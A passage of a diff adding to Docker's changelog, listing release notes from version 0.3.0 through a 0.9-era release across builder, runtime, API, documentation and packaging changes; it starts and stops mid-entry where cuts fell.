Bring back the memory and swap accounting section which was lost when the kernel page was removed. +- Explain DNS warnings and how to fix them on systems running and using a local nameserver. + +#### Contrib +- Add Tanglu support for mkimage-debootstrap. +- Add SteamOS support for mkimage-debootstrap. + +#### Hack +- Get package coverage when running integration tests. +- Remove the Vagrantfile. This is being replaced with boot2docker. +- Fix tests on systems where aufs isn't available. +- Update packaging instructions and remove the dependency on lxc. + +#### Remote API +* Move code specific to the API to the api package. +- Fix header content type for the API. Makes all endpoints use proper content type. +- Fix registry auth & remove ping calls from CmdPush and CmdPull. +- Add newlines to the JSON stream functions. + +#### Runtime +* Do not ping the registry from the CLI. All requests to registries flow through the daemon. +- Check for nil information return in the lxc driver. This fixes panics with older lxc versions. +- Devicemapper: cleanups and fix for unmount. Fixes two problems which were causing unmount to fail intermittently. +- Devicemapper: remove directory when removing device. Directories don't get left behind when removing the device. +* Devicemapper: enable skip_block_zeroing. Improves performance by not zeroing blocks. +- Devicemapper: fix shutdown warnings. Fixes shutdown warnings concerning pool device removal. +- Ensure docker cp stream is closed properly. Fixes problems with files not being copied by `docker cp`. +- Stop making `tcp://` default to `127.0.0.1:4243` and remove the default port for tcp. +- Fix `--run` in `docker commit`. This makes `docker commit --run` work again. +- Fix custom bridge related options. This makes custom bridges work again. ++ Mount-bind the PTY as container console. This allows tmux/screen to run. ++ Add the pure Go libcontainer library to make it possible to run containers using only features of the Linux kernel. ++ Add native exec driver which uses libcontainer and make it the default exec driver. +- Add support for handling extended attributes in archives. +* Set the container MTU to be the same as the host MTU. ++ Add simple sha256 checksums for layers to speed up `docker push`. +* Improve kernel version parsing. +* Allow flag grouping (`docker run -it`). +- Remove chroot exec driver. +- Fix divide by zero to fix panic. +- Rewrite `docker rmi`. +- Fix docker info with lxc 1.0.0. +- Fix fedora tty with apparmor. +* Don't always append env vars, replace defaults with vars from config. +* Fix a goroutine leak. +* Switch to Go 1.2.1. +- Fix unique constraint error checks. +* Handle symlinks for Docker's data directory and for TMPDIR. +- Add deprecation warnings for flags (-flag is deprecated in favor of --flag) +- Add apparmor profile for the native execution driver. +* Move system specific code from archive to pkg/system. +- Fix duplicate signal for `docker run -i -t` (issue #3336). +- Return correct process pid for lxc. +- Add a -G option to specify the group which unix sockets belong to. ++ Add `-f` flag to `docker rm` to force removal of running containers. ++ Kill ghost containers and restart all ghost containers when the docker daemon restarts. ++ Add `DOCKER_RAMDISK` environment variable to make Docker work when the root is on a ramdisk. + +## 0.8.1 (2014-02-18) + +#### Builder + +- Avoid extra mount/unmount during build. This removes an unneeded mount/unmount operation which was causing problems with devicemapper +- Fix regression with ADD of tar files. This stops Docker from decompressing tarballs added via ADD from the local file system +- Add error to `docker build --rm`. This adds a missing error check to ensure failures to remove containers are detected and reported + +#### Documentation + +* Update issue filing instructions +* Warn against the use of symlinks for Docker's storage folder +* Replace the Firefox example with an IceWeasel example +* Rewrite the PostgreSQL example using a Dockerfile and add more details to it +* Improve the OS X documentation + +#### Remote API + +- Fix broken images API for version less than 1.7 +- Use the right encoding for all API endpoints which return JSON +- Move remote api client to api/ +- Queue calls to the API using generic socket wait + +#### Runtime + +- Fix the use of custom settings for bridges and custom bridges +- Refactor the devicemapper code to avoid many mount/unmount race conditions and failures +- Remove two panics which could make Docker crash in some situations +- Don't ping registry from the CLI client +- Enable skip_block_zeroing for devicemapper. This stops devicemapper from always zeroing entire blocks +- Fix --run in `docker commit`. This makes docker commit store `--run` in the image configuration +- Remove directory when removing devicemapper device. This cleans up leftover mount directories +- Drop NET_ADMIN capability for non-privileged containers. Unprivileged containers can't change their network configuration +- Ensure `docker cp` stream is closed properly +- Avoid extra mount/unmount during container registration. This removes an unneeded mount/unmount operation which was causing problems with devicemapper +- Stop allowing tcp:// as a default tcp bin address which binds to 127.0.0.1:4243 and remove the default port ++ Mount-bind the PTY as container console. This allows tmux and screen to run in a container +- Clean up archive closing. This fixes and improves archive handling +- Fix engine tests on systems where temp directories are symlinked +- Add test methods for save and load +- Avoid temporarily unmounting the container when restarting it. This fixes a race for devicemapper during restart +- Support submodules when building from a GitHub repository +- Quote volume path to allow spaces +- Fix remote tar ADD behavior. This fixes a regression which was causing Docker to extract tarballs + +## 0.8.0 (2014-02-04) + +#### Notable features since 0.7.0 + +* Images and containers can be removed much faster +* Building an image from source with docker build is now much faster +* The Docker daemon starts and stops much faster +* The memory footprint of many common operations has been reduced, by streaming files instead of buffering them in memory, fixing memory leaks, and fixing various suboptimal memory allocations +* Several race conditions were fixed, making Docker more stable under very high concurrency load. This makes Docker more stable and less likely to crash and reduces the memory footprint of many common operations +* All packaging operations are now built on the Go language’s standard tar implementation, which is bundled with Docker itself. This makes packaging more portable across host distributions, and solves several issues caused by quirks and incompatibilities between different distributions of tar +* Docker can now create, remove and modify larger numbers of containers and images graciously thanks to more aggressive releasing of system resources. For example the storage driver API now allows Docker to do reference counting on mounts created by the drivers +With the ongoing changes to the networking and execution subsystems of docker testing these areas have been a focus of the refactoring. By moving these subsystems into separate packages we can test, analyze, and monitor coverage and quality of these packages +* Many components have been separated into smaller sub-packages, each with a dedicated test suite. As a result the code is better-tested, more readable and easier to change + +* The ADD instruction now supports caching, which avoids unnecessarily re-uploading the same source content again and again when it hasn’t changed +* The new ONBUILD instruction adds to your image a “trigger” instruction to be executed at a later time, when the image is used as the base for another build +* Docker now ships with an experimental storage driver which uses the BTRFS filesystem for copy-on-write +* Docker is officially supported on Mac OS X +* The Docker daemon supports systemd socket activation + +## 0.7.6 (2014-01-14) + +#### Builder + +* Do not follow symlink outside of build context + +#### Runtime + +- Remount bind mounts when ro is specified +* Use https for fetching docker version + +#### Other + +* Inline the test.docker.io fingerprint +* Add ca-certificates to packaging documentation + +## 0.7.5 (2014-01-09) + +#### Builder + +* Disable compression for build. More space usage but a much faster upload +- Fix ADD caching for certain paths +- Do not compress archive from git build + +#### Documentation + +- Fix error in GROUP add example +* Make sure the GPG fingerprint is inline in the documentation +* Give more specific advice on setting up signing of commits for DCO + +#### Runtime + +- Fix misspelled container names +- Do not add hostname when networking is disabled +* Return most recent image from the cache by date +- Return all errors from docker wait +* Add Content-Type Header "application/json" to GET /version and /info responses + +#### Other + +* Update DCO to version 1.1 ++ Update Makefile to use "docker:GIT_BRANCH" as the generated image name +* Update Travis to check for new 1.1 DCO version + +## 0.7.4 (2014-01-07) + +#### Builder + +- Fix ADD caching issue with . prefixed path +- Fix docker build on devicemapper by reverting sparse file tar option +- Fix issue with file caching and prevent wrong cache hit +* Use same error handling while unmarshalling CMD and ENTRYPOINT + +#### Documentation + +* Simplify and streamline Amazon Quickstart +* Install instructions use unprefixed Fedora image +* Update instructions for mtu flag for Docker on GCE ++ Add Ubuntu Saucy to installation +- Fix for wrong version warning on master instead of latest + +#### Runtime + +- Only get the image's rootfs when we need to calculate the image size +- Correctly handle unmapping UDP ports +* Make CopyFileWithTar use a pipe instead of a buffer to save memory on docker build +- Fix login message to say pull instead of push +- Fix "docker load" help by removing "SOURCE" prompt and mentioning STDIN +* Make blank -H option default to the same as no -H was sent +* Extract cgroups utilities to own submodule + +#### Other + ++ Add Travis CI configuration to validate DCO and gofmt requirements ++ Add Developer Certificate of Origin Text +* Upgrade VBox Guest Additions +* Check standalone header when pinging a registry server + +## 0.7.3 (2014-01-02) + +#### Builder + ++ Update ADD to use the image cache, based on a hash of the added content +* Add error message for empty Dockerfile + +#### Documentation + +- Fix outdated link to the "Introduction" on www.docker.io ++ Update the docs to get wider when the screen does +- Add information about needing to install LXC when using raw binaries +* Update Fedora documentation to disentangle the docker and docker.io conflict +* Add a note about using the new `-mtu` flag in several GCE zones ++ Add FrugalWare installation instructions ++ Add a more complete example of `docker run` +- Fix API documentation for creating and starting Privileged containers +- Add missing "name" parameter documentation on "/containers/create" +* Add a mention of `lxc-checkconfig` as a way to check for some of the necessary kernel configuration +- Update the 1.8 API documentation with some additions that were added to the docs for 1.7 + +#### Hack + +- Add missing libdevmapper dependency to the packagers documentation +* Update minimum Go requirement to a hard line at Go 1.2+ +* Many minor improvements to the Vagrantfile ++ Add ability to customize dockerinit search locations when compiling (to be used very sparingly only by packagers of platforms who require a nonstandard location) ++ Add coverprofile generation reporting +- Add `-a` to our Go build flags, removing the need for recompiling the stdlib manually +* Update Dockerfile to be more canonical and have less spurious warnings during build +- Fix some miscellaneous `docker pull` progress bar display issues +* Migrate more miscellaneous packages under the "pkg" folder +* Update TextMate highlighting to automatically be enabled for files named "Dockerfile" +* Reorganize syntax highlighting files under a common "contrib/syntax" directory +* Update install.sh script (https://get.docker.io/) to not fail if busybox fails to download or run at the end of the Ubuntu/Debian installation +* Add support for container names in bash completion + +#### Packaging + ++ Add an official Docker client binary for Darwin (Mac OS X) +* Remove empty "Vendor" string and added "License" on deb package ++ Add a stubbed version of "/etc/default/docker" in the deb package + +#### Runtime + +* Update layer application to extract tars in place, avoiding file churn while handling whiteouts +- Fix permissiveness of mtime comparisons in tar handling (since GNU tar and Go tar do not yet support sub-second mtime precision) +* Reimplement `docker top` in pure Go to work more consistently, and even inside Docker-in-Docker (thus removing the shell injection vulnerability present in some versions of `lxc-ps`) ++ Update `-H unix://` to work similarly to `-H tcp://` by inserting the default values for missing portions +- Fix more edge cases regarding dockerinit and deleted or replaced docker or dockerinit files +* Update container name validation to include '.' +- Fix use of a symlink or non-absolute path as the argument to `-g` to work as expected +* Update to handle external mounts outside of LXC, fixing many small mounting quirks and making future execution backends and other features simpler +* Update to use proper box-drawing characters everywhere in `docker images -tree` +* Move MTU setting from LXC configuration to directly use netlink +* Add `-S` option to external tar invocation for more efficient spare file handling ++ Add arch/os info to User-Agent string, especially for registry requests ++ Add `-mtu` option to Docker daemon for configuring MTU +- Fix `docker build` to exit with a non-zero exit code on error ++ Add `DOCKER_HOST` environment variable to configure the client `-H` flag without specifying it manually for every invocation + +## 0.7.2 (2013-12-16) + +#### Runtime + ++ Validate container names on creation with standard regex +* Increase maximum image depth to 127 from 42 +* Continue to move api endpoints to the job api ++ Add -bip flag to allow specification of dynamic bridge IP via CIDR +- Allow bridge creation when ipv6 is not enabled on certain systems +* Set hostname and IP address from within dockerinit +* Drop capabilities from within dockerinit +- Fix volumes on host when symlink is present the image +- Prevent deletion of image if ANY container is depending on it even if the container is not running +* Update docker push to use new progress display +* Use os.Lstat to allow mounting unix sockets when inspecting volumes +- Adjust handling of inactive user login +- Add missing defines in devicemapper for older kernels +- Allow untag operations with no container validation +- Add auth config to docker build + +#### Documentation + +* Add more information about Docker logging ++ Add RHEL documentation +* Add a direct example for changing the CMD that is run in a container +* Update Arch installation documentation ++ Add section on Trusted Builds ++ Add Network documentation page + +#### Other + ++ Add new cover bundle for providing code coverage reporting +* Separate integration tests in bundles +* Make Tianon the hack maintainer +* Update mkimage-debootstrap with more tweaks for keeping images small +* Use https to get the install script +* Remove vendored dotcloud/tar now that Go 1.2 has been released + +## 0.7.1 (2013-12-05) + +#### Documentation + ++ Add @SvenDowideit as documentation maintainer ++ Add links example ++ Add documentation regarding ambassador pattern ++ Add Google Cloud Platform docs ++ Add dockerfile best practices +* Update doc for RHEL +* Update doc for registry +* Update Postgres examples +* Update doc for Ubuntu install +* Improve remote api doc + +#### Runtime + ++ Add hostconfig to docker inspect ++ Implement `docker log -f` to stream logs ++ Add env variable to disable kernel version warning ++ Add -format to `docker inspect` ++ Support bind-mount for files +- Fix bridge creation on RHEL +- Fix image size calculation +- Make sure iptables are called even if the bridge already exists +- Fix issue with stderr only attach +- Remove init layer when destroying a container +- Fix same port binding on different interfaces +- `docker build` now returns the correct exit code +- Fix `docker port` to display correct port +- `docker build` now check that the dockerfile exists client side +- `docker attach` now returns the correct exit code +- Remove the name entry when the container does not exist + +#### Registry + +* Improve progress bars, add ETA for downloads +* Simultaneous pulls now waits for the first to finish instead of failing +- Tag only the top-layer image when pushing to registry +- Fix issue with offline image transfer +- Fix issue preventing using ':' in password for registry + +#### Other + ++ Add pprof handler for debug ++ Create a Makefile +* Use stdlib tar that now includes fix +* Improve make.sh test script +* Handle SIGQUIT on the daemon +* Disable verbose during tests +* Upgrade to go1.2 for official build +* Improve unit tests +* The test suite now runs all tests even if one fails +* Refactor C in Go (Devmapper) +- Fix OS X compilation + +## 0.7.0 (2013-11-25) + +#### Notable features since 0.6.0 + +* Storage drivers: choose from aufs, device-mapper, or vfs. +* Standard Linux support: docker now runs on unmodified Linux kernels and all major distributions. +* Links: compose complex software stacks by connecting containers to each other. +* Container naming: organize your containers by giving them memorable names. +* Advanced port redirects: specify port redirects per interface, or keep sensitive ports private. +* Offline transfer: push and pull images to the filesystem without losing information. +* Quality: numerous bugfixes and small usability improvements. Significant increase in test coverage. + +## 0.6.7 (2013-11-21) + +#### Runtime + +* Improve stability, fixes some race conditions +* Skip the volumes mounted when deleting the volumes of container. +* Fix layer size computation: handle hard links correctly +* Use the work Path for docker cp CONTAINER:PATH +* Fix tmp dir never cleanup +* Speedup docker ps +* More informative error message on name collisions +* Fix nameserver regex +* Always return long id's +* Fix container restart race condition +* Keep published ports on docker stop;docker start +* Fix container networking on Fedora +* Correctly express "any address" to iptables +* Fix network setup when reconnecting to ghost container +* Prevent deletion if image is used by a running container +* Lock around read operations in graph + +#### RemoteAPI + +* Return full ID on docker rmi + +#### Client + ++ Add -tree option to images ++ Offline image transfer +* Exit with status 2 on usage error and display usage on stderr +* Do not forward SIGCHLD to container +* Use string timestamp for docker events -since + +#### Other + +* Update to go 1.2rc5 ++ Add /etc/default/docker support to upstart + +## 0.6.6 (2013-11-06) + +#### Runtime + +* Ensure container name on register +* Fix regression in /etc/hosts ++ Add lock around write operations in graph +* Check if port is valid +* Fix restart runtime error with ghost container networking ++ Add some more colors and animals to increase the pool of generated names +* Fix issues in docker inspect ++ Escape apparmor confinement ++ Set environment variables using a file. +* Prevent docker insert to erase something ++ Prevent DNS server conflicts in CreateBridgeIface ++ Validate bind mounts on the server side ++ Use parent image config in docker build +* Fix regression in /etc/hosts + +#### Client + ++ Add -P flag to publish all exposed ports ++ Add -notrunc and -q flags to docker history +* Fix docker commit, tag and import usage ++ Add stars, trusted builds and library flags in docker search +* Fix docker logs with tty + +#### RemoteAPI + +* Make /events API send headers immediately +* Do not split last column docker top ++ Add size to history + +#### Other + ++ Contrib: Desktop integration. Firefox usecase. ++ Dockerfile: bump to go1.2rc3 + +## 0.6.5 (2013-10-29) + +#### Runtime + ++ Containers can now be named ++ Containers can now be linked together for service discovery ++ 'run -a', 'start -a' and 'attach' can forward signals to the container for better integration with process supervisors ++ Automatically start crashed containers after a reboot ++ Expose IP, port, and proto as separate environment vars for container links +* Allow ports to be published to specific ips +* Prohibit inter-container communication by default +- Ignore ErrClosedPipe for stdin in Container.Attach +- Remove unused field kernelVersion +* Fix issue when mounting subdirectories of /mnt in container +- Fix untag during removal of images +* Check return value of syscall.Chdir when changing working directory inside dockerinit + +#### Client + +- Only pass stdin to hijack when needed to avoid closed pipe errors +* Use less reflection in command-line method invocation +- Monitor the tty size after starting the container, not prior +- Remove useless os.Exit() calls after log.Fatal + +#### Hack + ++ Add initial init scripts library and a safer Ubuntu packaging script that works for Debian +* Add -p option to invoke debootstrap with http_proxy +- Update install.sh with $sh_c to get sudo/su for modprobe +* Update all the mkimage scripts to use --numeric-owner as a tar argument +* Update hack/release.sh process to automatically invoke hack/make.sh and bail on build and test issues + +#### Other + +* Documentation: Fix the flags for nc in example +* Testing: Remove warnings and prevent mount issues +- Testing: Change logic for tty resize to avoid warning in tests +- Builder: Fix race condition in docker build with verbose output +- Registry: Fix content-type for PushImageJSONIndex method +* Contrib: Improve helper tools to generate debian and Arch linux server images + +## 0.6.4 (2013-10-16) + +#### Runtime + +- Add cleanup of container when Start() fails +* Add better comments to utils/stdcopy.go +* Add utils.Errorf for error logging ++ Add -rm to docker run for removing a container on exit +- Remove error messages which are not actually errors +- Fix `docker rm` with volumes +- Fix some error cases where an HTTP body might not be closed +- Fix panic with wrong dockercfg file +- Fix the attach behavior with -i +* Record termination time in state. +- Use empty string so TempDir uses the OS's temp dir automatically +- Make sure to close the network allocators ++ Autorestart containers by default +* Bump vendor kr/pty to commit 3b1f6487b `(syscall.O_NOCTTY)` +* lxc: Allow set_file_cap capability in container +- Move run -rm to the cli only +* Split stdout stderr +* Always create a new session for the container + +#### Testing + +- Add aggregated docker-ci email report +- Add cleanup to remove leftover containers +* Add nightly release to docker-ci +* Add more tests around auth.ResolveAuthConfig +- Remove a few errors in tests +- Catch errClosing error when TCP and UDP proxies are terminated +* Only run certain tests with TESTFLAGS='-run TestName' make.sh +* Prevent docker-ci to test closing PRs +* Replace panic by log.Fatal in tests +- Increase TestRunDetach timeout + +#### Documentation + +* Add initial draft of the Docker infrastructure doc +* Add devenvironment link to CONTRIBUTING.md +* Add `apt-get install curl` to Ubuntu docs +* Add explanation for export restrictions +* Add .dockercfg doc +* Remove Gentoo install notes about #1422 workaround +* Fix help text for -v option +* Fix Ping endpoint documentation +- Fix parameter names in docs for ADD command +- Fix ironic typo in changelog +* Various command fixes in postgres example +* Document how to edit and release docs +- Minor updates to `postgresql_service.rst` +* Clarify LGTM process to contributors +- Corrected error in the package name +* Document what `vagrant up` is actually doing ++ improve doc search results +* Cleanup whitespace in API 1.5 docs +* use angle brackets in MAINTAINER example email +* Update archlinux.rst ++ Changes to a new style for the docs. Includes version switcher. +* Formatting, add information about multiline json +* Improve registry and index REST API documentation +- Replace deprecated upgrading reference to docker-latest.tgz, which hasn't been updated since 0.5.3 +* Update Gentoo installation documentation now that we're in the portage tree proper +* Cleanup and reorganize docs and tooling for contributors and maintainers +- Minor spelling correction of protocoll -> protocol + +#### Contrib + +* Add vim syntax highlighting for Dockerfiles from @honza +* Add mkimage-arch.sh +* Reorganize contributed completion scripts to add zsh completion + +#### Hack + +* Add vagrant user to the docker group +* Add proper bash completion for "docker push" +* Add xz utils as a runtime dep +* Add cleanup/refactor portion of #2010 for hack and Dockerfile updates ++ Add contrib/mkimage-centos.sh back (from #1621), and associated documentation link +* Add several of the small make.sh fixes from #1920, and make the output more consistent and contributor-friendly ++ Add @tianon to hack/MAINTAINERS +* Improve network performance for VirtualBox +* Revamp install.sh to be usable by more people, and to use official install methods whenever possible (apt repo, portage tree, etc.) +- Fix contrib/mkimage-debian.sh apt caching prevention ++ Add Dockerfile.tmLanguage to contrib +* Configured FPM to make /etc/init/docker.conf a config file +* Enable SSH Agent forwarding in Vagrant VM +* Several small tweaks/fixes for contrib/mkimage-debian.sh + +#### Other + +- Builder: Abort build if mergeConfig returns an error and fix duplicate error message +- Packaging: Remove deprecated packaging directory +- Registry: Use correct auth config when logging in. +- Registry: Fix the error message so it is the same as the regex + +## 0.6.3 (2013-09-23) + +#### Packaging + +* Add 'docker' group on install for ubuntu package +* Update tar vendor dependency +* Download apt key over HTTPS + +#### Runtime + +- Only copy and change permissions on non-bindmount volumes +* Allow multiple volumes-from +- Fix HTTP imports from STDIN + +#### Documentation + +* Update section on extracting the docker binary after build +* Update development environment docs for new build process +* Remove 'base' image from documentation + +#### Other + +- Client: Fix detach issue +- Registry: Update regular expression to match index + +## 0.6.2 (2013-09-17) + +#### Runtime + ++ Add domainname support ++ Implement image filtering with path.Match +* Remove unnecessary warnings +* Remove os/user dependency +* Only mount the hostname file when the config exists +* Handle signals within the `docker login` command +- UID and GID are now also applied to volumes +- `docker start` set error code upon error +- `docker run` set the same error code as the process started + +#### Builder + ++ Add -rm option in order to remove intermediate containers +* Allow multiline for the RUN instruction + +#### Registry + +* Implement login with private registry +- Fix push issues + +#### Other + ++ Hack: Vendor all dependencies +* Remote API: Bump to v1.5 +* Packaging: Break down hack/make.sh into small scripts, one per 'bundle': test, binary, ubuntu etc. +* Documentation: General improvements + +## 0.6.1 (2013-08-23) + +#### Registry + +* Pass "meta" headers in API calls to the registry + +#### Packaging + +- Use correct upstart script with new build tool +- Use libffi-dev, don`t build it from sources +- Remove duplicate mercurial install command + +## 0.6.0 (2013-08-22) + +#### Runtime + ++ Add lxc-conf flag to allow custom lxc options ++ Add an option to set the working directory +* Add Image name to LogEvent tests ++ Add -privileged flag and relevant tests, docs, and examples +* Add websocket support to /container//attach/ws +* Add warning when net.ipv4.ip_forwarding = 0 +* Add hostname to environment +* Add last stable version in `docker version` +- Fix race conditions in parallel pull +- Fix Graph ByParent() to generate list of child images per parent image. +- Fix typo: fmt.Sprint -> fmt.Sprintf +- Fix small \n error un docker build +* Fix to "Inject dockerinit at /.dockerinit" +* Fix #910. print user name to docker info output +* Use Go 1.1.2 for dockerbuilder +* Use ranged for loop on channels +- Use utils.ParseRepositoryTag instead of strings.Split(name, ":") in server.ImageDelete +- Improve CMD, ENTRYPOINT, and attach docs. +- Improve connect message with socket error +- Load authConfig only when needed and fix useless WARNING +- Show tag used when image is missing +* Apply volumes-from before creating volumes +- Make docker run handle SIGINT/SIGTERM +- Prevent crash when .dockercfg not readable +- Install script should be fetched over https, not http. +* API, issue 1471: Use groups for socket permissions +- Correctly detect IPv4 forwarding +* Mount /dev/shm as a tmpfs +- Switch from http to https for get.docker.io +* Let userland proxy handle container-bound traffic +* Update the Docker CLI to specify a value for the "Host" header. +- Change network range to avoid conflict with EC2 DNS +- Reduce connect and read timeout when pinging the registry +* Parallel pull +- Handle ip route showing mask-less IP addresses +* Allow ENTRYPOINT without CMD +- Always consider localhost as a domain name when parsing the FQN repos name +* Refactor checksum + +#### Documentation + +* Add MongoDB image example +* Add instructions for creating and using the docker group +* Add sudo to examples and installation to documentation +* Add ufw doc +* Add a reference to ps -a +* Add information about Docker`s high level tools over LXC. +* Fix typo in docs for docker run -dns +* Fix a typo in the ubuntu installation guide +* Fix to docs regarding adding docker groups +* Update default -H docs +* Update readme with dependencies for building +* Update amazon.rst to explain that Vagrant is not necessary for running Docker on ec2 +* PostgreSQL service example in documentation +* Suggest installing linux-headers by default. +* Change the twitter handle +* Clarify Amazon EC2 installation +* 'Base' image is deprecated and should no longer be referenced in the docs. +* Move note about officially supported kernel +- Solved the logo being squished in Safari + +#### Builder + ++ Add USER instruction do Dockerfile ++ Add workdir support for the Buildfile +* Add no cache for docker build +- Fix docker build and docker events output +- Only count known instructions as build steps +- Make sure ENV instruction within build perform a commit each time +- Forbid certain paths within docker build ADD +- Repository name (and optionally a tag) in build usage +- Make sure ADD will create everything in 0755 + +#### Remote API + +* Sort Images by most recent creation date. +* Reworking opaque requests in registry module +* Add image name in /events +* Use mime pkg to parse Content-Type +* 650 http utils and user agent field + +#### Hack + ++ Bash Completion: Limit commands to containers of a relevant state +* Add docker dependencies coverage testing into docker-ci + +#### Packaging + ++ Docker-brew 0.5.2 support and memory footprint reduction +* Add new docker dependencies into docker-ci +- Revert "docker.upstart: avoid spawning a `sh` process" ++ Docker-brew and Docker standard library ++ Release docker with docker +* Fix the upstart script generated by get.docker.io +* Enabled the docs to generate manpages. +* Revert Bind daemon to 0.0.0.0 in Vagrant. + +#### Register + +* Improve auth push +* Registry unit tests + mock registry + +#### Tests + +* Improve TestKillDifferentUser to prevent timeout on buildbot +- Fix typo in TestBindMounts (runContainer called without image) +* Improve TestGetContainersTop so it does not rely on sleep +* Relax the lo interface test to allow iface index != 1 +* Add registry functional test to docker-ci +* Add some tests in server and utils + +#### Other + +* Contrib: bash completion script +* Client: Add docker cp command and copy api endpoint to copy container files/folders to the host +* Don`t read from stdout when only attached to stdin + +## 0.5.3 (2013-08-13) + +#### Runtime + +* Use docker group for socket permissions +- Spawn shell within upstart script +- Handle ip route showing mask-less IP addresses +- Add hostname to environment + +#### Builder + +- Make sure ENV instruction within build perform a commit each time + +## 0.5.2 (2013-08-08) + +* Builder: Forbid certain paths within docker build ADD +- Runtime: Change network range to avoid conflict with EC2 DNS +* API: Change daemon to listen on unix socket by default + +## 0.5.1 (2013-07-30) + +#### Runtime + ++ Add `ps` args to `docker top` ++ Add support for container ID files (pidfile like) ++ Add container=lxc in default env ++ Support networkless containers with `docker run -n` and `docker -d -b=none` +* Stdout/stderr logs are now stored in the same file as JSON +* Allocate a /16 IP range by default, with fallback to /24. Try 12 ranges instead of 3. +* Change .dockercfg format to json and support multiple auth remote +- Do not override volumes from config +- Fix issue with EXPOSE override + +#### API + ++ Docker client now sets useragent (RFC 2616) ++ Add /events endpoint + +#### Builder + ++ ADD command now understands URLs ++ CmdAdd and CmdEnv now respect Dockerfile-set ENV variables +- Create directories with 755 instead of 700 within ADD instruction + +#### Hack + +* Simplify unit tests with helpers +* Improve docker.upstart event +* Add coverage testing into docker-ci + +## 0.5.0 (2013-07-17) + +#### Runtime + ++ List all processes running inside a container with 'docker top' ++ Host directories can be mounted as volumes with 'docker run -v' ++ Containers can expose public UDP ports (eg, '-p 123/udp') ++ Optionally specify an exact public port (eg. '-p 80:4500') +* 'docker login' supports additional options +- Don't save a container`s hostname when committing an image. + +#### Registry + ++ New image naming scheme inspired by Go packaging convention allows arbitrary combinations of registries +- Fix issues when uploading images to a private registry + +#### Builder + ++ ENTRYPOINT instruction sets a default binary entry point to a container ++ VOLUME instruction marks a part of the container as persistent data +* 'docker build' displays the full output of a build by default + +## 0.4.8 (2013-07-01) + ++ Builder: New build operation ENTRYPOINT adds an executable entry point to the container. - Runtime: Fix a bug which caused 'docker run -d' to no longer print the container ID. +- Tests: Fix issues in the test suite + +## 0.4.7 (2013-06-28) + +#### Remote API + +* The progress bar updates faster when downloading and uploading large files +- Fix a bug in the optional unix socket transport + +#### Runtime + +* Improve detection of kernel version ++ Host directories can be mounted as volumes with 'docker run -b' +- fix an issue when only attaching to stdin +* Use 'tar --numeric-owner' to avoid uid mismatch across multiple hosts + +#### Hack + +* Improve test suite and dev environment +* Remove dependency on unit tests on 'os/user' + +#### Other + +* Registry: easier push/pull to a custom registry ++ Documentation: add terminology section + +## 0.4.6 (2013-06-22) + +- Runtime: fix a bug which caused creation of empty images (and volumes) to crash. + +## 0.4.5 (2013-06-21) + ++ Builder: 'docker build git://URL' fetches and builds a remote git repository +* Runtime: 'docker ps -s' optionally prints container size +* Tests: improved and simplified +- Runtime: fix a regression introduced in 0.4.3 which caused the logs command to fail. +- Builder: fix a regression when using ADD with single regular file. + +## 0.4.4 (2013-06-19) + +- Builder: fix a regression introduced in 0.4.3 which caused builds to fail on new clients. + +## 0.4.3 (2013-06-19) + +#### Builder + ++ ADD of a local file will detect tar archives and unpack them +* ADD improvements: use tar for copy + automatically unpack local archives +* ADD uses tar/untar for copies instead of calling 'cp -ar' +* Fix the behavior of ADD to be (mostly) reverse-compatible, predictable and well-documented. +- Fix a bug which caused builds to fail if ADD was the first command +* Nicer output for 'docker build' + +#### Runtime + +* Remove bsdtar dependency +* Add unix socket and multiple -H support +* Prevent rm of running containers +* Use go1.1 cookiejar +- Fix issue detaching from running TTY container +- Forbid parallel push/pull for a single image/repo. Fixes #311 +- Fix race condition within Run command when attaching. + +#### Client + +* HumanReadable ProgressBar sizes in pull +* Fix docker version`s git commit output + +#### API + +* Send all tags on History API call +* Add tag lookup to history command. Fixes #882 + +#### Documentation + +- Fix missing command in irc bouncer example + +## 0.4.2 (2013-06-17) + +- Packaging: Bumped version to work around an Ubuntu bug + +## 0.4.1 (2013-06-17) + +#### Remote Api + ++ Add flag to enable cross domain requests ++ Add images and containers sizes in docker ps and docker images + +#### Runtime + ++ Configure dns configuration host-wide with 'docker -d -dns' ++ Detect faulty DNS configuration and replace it with a public default ++ Allow docker run : ++ You can now specify public port (ex: -p 80:4500) +* Improve image removal to garbage-collect unreferenced parents + +#### Client + +* Allow multiple params in inspect +* Print the container id before the hijack in `docker run` + +#### Registry + +* Add regexp check on repo`s name +* Move auth to the client +- Remove login check on pull + +#### Other + +* Vagrantfile: Add the rest api port to vagrantfile`s port_forward +* Upgrade to Go 1.1 +- Builder: don`t ignore last line in Dockerfile when it doesn`t end with \n + +## 0.4.0 (2013-06-03) + +#### Builder + ++ Introducing Builder ++ 'docker build' builds a container, layer by layer, from a source repository containing a Dockerfile + +#### Remote API + ++ Introducing Remote API ++ control Docker programmatically using a simple HTTP/json API + +#### Runtime + +* Various reliability and usability improvements + +## 0.3.4 (2013-05-30) + +#### Builder + ++ 'docker build' builds a container, layer by layer, from a source repository containing a Dockerfile ++ 'docker build -t FOO' applies the tag FOO to the newly built container. + +#### Runtime + ++ Interactive TTYs correctly handle window resize +* Fix how configuration is merged between layers + +#### Remote API + ++ Split stdout and stderr on 'docker run' ++ Optionally listen on a different IP and port (use at your own risk) + +#### Documentation + +* Improve install instructions. + +## 0.3.3 (2013-05-23) + +- Registry: Fix push regression +- Various bugfixes + +## 0.3.2 (2013-05-09) + +#### Registry + +* Improve the checksum process +* Use the size to have a good progress bar while pushing +* Use the actual archive if it exists in order to speed up the push +- Fix error 400 on push + +#### Runtime + +* Store the actual archive on commit + +## 0.3.1 (2013-05-08) + +#### Builder + ++ Implement the autorun capability within docker builder ++ Add caching to docker builder ++ Add support for docker builder with native API as top level command ++ Implement ENV within docker builder +- Check the command existence prior create and add Unit tests for the case +* use any whitespaces instead of tabs + +#### Runtime + ++ Add go version to debug infos +* Kernel version - don`t show the dash if flavor is empty + +#### Registry + ++ Add docker search top level command in order to search a repository +- Fix pull for official images with specific tag +- Fix issue when login in with a different user and trying to push +* Improve checksum - async calculation + +#### Images + ++ Output graph of images to dot (graphviz) +- Fix ByParent function + +#### Documentation + ++ New introduction and high-level overview ++ Add the documentation for docker builder +- CSS fix for docker documentation to make REST API docs look better. +- Fix CouchDB example page header mistake +- Fix README formatting +* Update www.docker.io website. + +#### Other + ++ Website: new high-level overview +- Makefile: Swap "go get" for "go get -d", especially to compile on go1.1rc +* Packaging: packaging ubuntu; issue #510: Use goland-stable PPA package to build docker + +## 0.3.0 (2013-05-06) + +#### Runtime + +- Fix the command existence check +- strings.Split may return an empty string on no match +- Fix an index out of range crash if 